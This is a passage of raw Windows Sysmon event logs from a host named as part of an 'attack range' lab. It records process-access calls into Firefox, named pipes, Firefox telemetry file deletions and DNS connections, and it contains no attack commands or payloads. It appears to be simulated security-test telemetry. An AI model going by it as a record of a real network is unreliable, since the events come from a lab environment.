Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\9d1edc28-da51-4d97-95f8-7ad216e791f6MD5=3C6B25071C8E9244654F91F84B1C922F,SHA256=7C55C0E0517D9313ED6BD5A24DDEE56A3DFF53DC1133D670824F0E353A882B1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.643{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.643{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.643{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.633{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.632{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.632{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.631{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000042686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.046{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57388- 354300x800000000000000042685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.037{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50918- 23542300x800000000000000042684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.620{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B53F1E0F1F1E09A18753D6D59772FC65,SHA256=FC89D9F9C596F89E0553D2690AA1070544F0273FC96F38685D79171D977EC64E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.600{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.599{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.599{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.599{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.598{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.598{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.589{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-4C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.589{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-4C:\Program Files\Mozilla Firefox\firefox.exe 18141800x800000000000000042675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.588{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-3C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.588{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-3C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.572{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.571{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.570{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.567{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.8576523342828632993C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.567{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.8576523342828632993C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.565{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.565{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.6.95968971C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.565{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.561{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.3393878630704753708C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.561{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.3393878630704753708C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.560{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.559{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.5.112535918C:\Program Files\Mozilla Firefox\firefox.exe 18141800x800000000000000042661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.558{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-2C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.558{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-2C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.553{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.553{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.553{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\d6e1b137-769b-42b9-8819-5017416acadaMD5=DE1B0EE7D50B3F3D2486D709BD5BA35F,SHA256=2D4BBFC43BAEBE7D917937C631EFD93610D953BE4425B4ECFC85A2ACB528B484,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.547{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.547{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.537{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.536{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\